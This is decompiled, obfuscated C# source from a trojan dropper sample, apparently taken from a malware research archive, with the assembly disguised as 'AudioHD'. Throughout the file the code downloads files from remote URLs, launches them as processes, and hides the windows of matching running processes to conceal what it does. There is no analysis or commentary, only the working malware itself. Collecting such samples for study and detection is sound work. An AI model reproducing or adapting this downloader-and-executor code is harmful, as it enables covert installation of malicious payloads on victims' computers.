MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0002.cs

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe

using \u0001;
using \u0008;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;

namespace \u0008
{
  internal sealed class \u0002
  {
    [NonSerialized]
    internal static \u0002 \u0001;
    public static bool \u0001;
    public static bool \u0002;
    public static bool \u0003;
    public static string \u0001;
    public static string \u0002;
    public static string \u0003;
    public static string \u0004;
    public static string \u0005;
    public static string \u0006;

    [DllImport("user32.dll", EntryPoint = "ShowWindow")]
    private static extern int \u000F([In] int obj0, [In] int obj1);

    internal static void \u000F([In] string obj0, [In] string obj1)
    {
      if (\u0002.\u000F())
      {
        \u0002.\u0010(obj0, obj1);
        \u0002.\u0001 = true;
        \u0002.\u0010(\u0002.\u0001(2144));
      }
      else if (!\u0002.\u0010())
      {
        if (!\u0002.\u0011())
          return;
        \u0002.\u000F(obj0);
        \u0002.\u0003 = true;
        \u0002.\u0010(\u0002.\u0001(2174));
      }
      else
      {
        \u0002.\u0011(obj0, obj1);
        \u0002.\u0002 = true;
        \u0002.\u0010(\u0002.\u0001(2157));
      }
    }

    internal static bool \u000F() => System.IO.File.Exists(\u0002.\u0001);

    internal static bool \u0010() => System.IO.File.Exists(\u0002.\u0003);

    internal static bool \u0011() => System.IO.File.Exists(\u0002.\u0002);

    private static void \u0010([In] string obj0, [In] string obj1)
    {
      new WebClient().DownloadFile(obj0, obj1);
      Process.Start(new ProcessStartInfo()
      {
        FileName = \u0002.\u0001,
        Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
      });
      Thread.Sleep(1000);
    }

    private static void \u000F([In] string obj0)
    {
      Process.Start(new ProcessStartInfo()
      {
        FileName = \u0002.\u0002,
        Arguments = obj0
      });
      Thread.Sleep(1000);
    }

    private static void \u0011([In] string obj0, [In] string obj1)
    {
      new WebClient().DownloadFile(obj0, obj1);
      Process.Start(new ProcessStartInfo()
      {
        FileName = \u0002.\u0001,
        Arguments = \u0002.\u0001(2187) + Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + \u0002.\u0001(2204) + obj1
      });
      Thread.Sleep(1000);
    }

    private static void \u0010([In] string obj0)
    {
      foreach (Process process in Process.GetProcesses())
      {
        if (process.ProcessName.Contains(obj0))
        {
          try
          {
            \u0002.\u000F(process.MainWindowHandle.ToInt32(), 0);
          }
          catch
          {
          }
        }
      }
    }

    static \u0002()
    {
      \u0003.\u000F();
      \u0002.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2209);
      \u0002.\u0002 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2242);
      \u0002.\u0003 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0002.\u0001(2267);
      \u0002.\u0004 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2304);
      \u0002.\u0005 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2321);
      \u0002.\u0006 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0002.\u0001(2338);
    }
  }
}